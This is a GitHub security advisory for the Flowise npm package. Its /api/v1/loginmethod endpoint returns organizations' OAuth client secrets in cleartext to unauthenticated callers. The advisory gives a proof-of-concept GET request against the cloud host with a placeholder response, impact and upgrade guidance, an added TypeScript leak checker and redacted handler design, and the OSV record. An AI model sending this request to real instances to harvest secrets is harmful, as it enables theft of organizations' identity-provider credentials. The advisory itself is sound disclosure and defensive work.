GHSA-6PCV-J4JX-M4VX

Vulnerability from github – Published: 2026-04-16 21:20 – Updated: 2026-04-16 21:20
Summary
Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request
Details

Summary

The /api/v1/loginmethod endpoint is missing authentication (CWE-306). Any client that supplies an organizationId, with no session cookie and no Authorization header, receives that organization's full SSO configuration, and that configuration carries the OAuth client secrets in cleartext (CWE-312).

PoC

The following request can be sent by anyone on the internet without cookies or an Authorization header:

Request

GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2
Host: cloud.flowiseai.com
Accept: application/json
Content-Type: application/json

Response: the server returns 200 OK with the full provider configuration, including each provider's clientSecret, to the unauthenticated caller (the values in this sample are placeholders):

{
  "providers": [
    {
      "id": "a04ba769-b810-481d-8d6b-84f8c377dea5",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "azure",
      "config": {
        "tenantID": "",
        "clientID": "",
        "clientSecret": ""
      },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "eda8bd90-1c45-4aca-933f-3a53d9be4161",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "google",
      "config": {
        "clientID": "123455",
        "clientSecret": "123455"
      },
      "status": "enable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "auth0",
      "config": {
        "domain": "",
        "clientID": "",
        "clientSecret": ""
      },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "github",
      "config": {
        "clientID": "",
        "clientSecret": ""
      },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    }
  ],
  "callbacks": [
    {
      "providerName": "azure",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback"
    },
    {
      "providerName": "google",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback"
    },
    {
      "providerName": "auth0",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback"
    },
    {
      "providerName": "github",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback"
    }
  ]
}

Affected Deployments

  • FlowiseAI Cloud (cloud.flowiseai.com)
  • Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is reachable by untrusted clients
  • npm package flowise, all versions up to and including 3.0.13; fixed in 3.1.0 (per the GHSA record below)

Impact

An unauthenticated attacker can harvest the OAuth client secrets (Google, Microsoft/Azure, Auth0, GitHub) of any organization whose organizationId they supply, together with each provider's status, the callback URLs, and the user IDs that created and last updated each provider record. A client ID and client secret let the attacker authenticate to the identity provider as the organization's registered OAuth application, which the reporter describes as complete compromise of the organization's third-party integrations and a potential data breach. The reporter rates the issue critical; GitHub's reviewed severity is Moderate, with CVSS 3.0 vector AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (5.3). Operators of exposed instances should upgrade to 3.1.0 or later and rotate the client secret of every configured provider, since any secret served before the upgrade must be assumed harvested.
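The following is an added example written for this page; it is not Flowise's code and does not describe the fix shipped in 3.1.0. It models the response shape shown in the PoC and demonstrates two things a practitioner wants around this advisory: a tester's check that flags secret-bearing keys in a body obtained without credentials, and one defensible way to shape the /api/v1/loginmethod response so that a guest learns only which providers exist and are enabled. Every type, function name, session field and sample value below is an assumption.

```typescript
// Added example for GHSA-6pcv-j4jx-m4vx. Not Flowise's code; all names,
// types and sample data are assumptions made for illustration.

type Provider = {
  id: string;
  organizationId: string;
  name: string;
  config: { [key: string]: string };
  status: "enable" | "disable";
};
type ProviderCallback = { providerName: string; callbackURL: string };
type LoginMethodResponse = { providers: Provider[]; callbacks: ProviderCallback[] };

// Constructed sample shaped like the advisory's 200 OK body (placeholder values).
const SAMPLE: LoginMethodResponse = {
  providers: [
    { id: "p-azure", organizationId: "org-1", name: "azure", status: "disable",
      config: { tenantID: "", clientID: "", clientSecret: "" } },
    { id: "p-google", organizationId: "org-1", name: "google", status: "enable",
      config: { clientID: "123455", clientSecret: "123455" } },
    { id: "p-auth0", organizationId: "org-1", name: "auth0", status: "disable",
      config: { domain: "", clientID: "", clientSecret: "" } },
    { id: "p-github", organizationId: "org-1", name: "github", status: "disable",
      config: { clientID: "", clientSecret: "" } },
  ],
  callbacks: [
    { providerName: "azure", callbackURL: "https://flowise.example/api/v1/azure/callback" },
    { providerName: "google", callbackURL: "https://flowise.example/api/v1/google/callback" },
  ],
};

// Key names that must never appear in a body served without authentication.
const SECRET_KEY = /secret|private[_-]?key|password/i;

type Leak = { path: string; populated: boolean };

// Walk a parsed JSON body and report every secret-bearing key. `populated`
// separates a harvestable value from an empty slot; both are findings, since
// the field itself should not be present in an unauthenticated response.
function findSecretLeaks(value: unknown, path: string = ""): Leak[] {
  const leaks: Leak[] = [];
  if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) {
      leaks.push(...findSecretLeaks(value[i], path + "/" + i));
    }
  } else if (value !== null && typeof value === "object") {
    const obj = value as { [key: string]: unknown };
    for (const key of Object.keys(obj)) {
      const here = path + "/" + key;
      if (SECRET_KEY.test(key)) {
        const v = obj[key];
        leaks.push({ path: here, populated: typeof v === "string" && v.length > 0 });
      }
      leaks.push(...findSecretLeaks(obj[key], here));
    }
  }
  return leaks;
}

type PublicView = {
  providers: { name: string; status: string }[];
  callbacks: ProviderCallback[];
};

// What a login page needs: which providers exist and whether they are enabled,
// plus the callback URLs, which are public by design. No provider config at
// all, so no clientID, tenant, domain or secret leaves the server.
function publicLoginMethods(full: LoginMethodResponse): PublicView {
  return {
    providers: full.providers.map(function (p) {
      return { name: p.name, status: p.status };
    }),
    callbacks: full.callbacks,
  };
}

type Session = { userId: string; organizationId: string; isAdmin: boolean };
type LoginMethodRequest = { organizationId: string; session?: Session };
type LoginMethodReply = { status: number; body: unknown };

// Assumed handler design: organizationId still selects the record, but the
// full configuration is returned only to a caller whose session belongs to
// that same organization and carries the admin role. Everyone else, including
// authenticated users of other organizations, gets the redacted view.
function handleLoginMethod(
  req: LoginMethodRequest,
  store: { [orgId: string]: LoginMethodResponse }
): LoginMethodReply {
  if (!Object.prototype.hasOwnProperty.call(store, req.organizationId)) {
    return { status: 404, body: { error: "unknown organization" } };
  }
  const full = store[req.organizationId];
  const s = req.session;
  const orgAdmin = s !== undefined && s.organizationId === req.organizationId && s.isAdmin;
  return { status: 200, body: orgAdmin ? full : publicLoginMethods(full) };
}
```

Against a live self-hosted instance the check is simply the PoC request above followed by findSecretLeaks over the parsed body; any finding, populated or not, means the endpoint still hands provider configuration to guests. Even for organization admins, a stricter design treats client secrets as write-only and returns only whether one is configured, so that no read path exists for the secret at all.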

Source record (GitHub advisory database, OSV format)

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-312"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T21:20:05Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "id": "GHSA-6pcv-j4jx-m4vx",
  "modified": "2026-04-16T21:20:05Z",
  "published": "2026-04-16T21:20:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6pcv-j4jx-m4vx"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request"
}
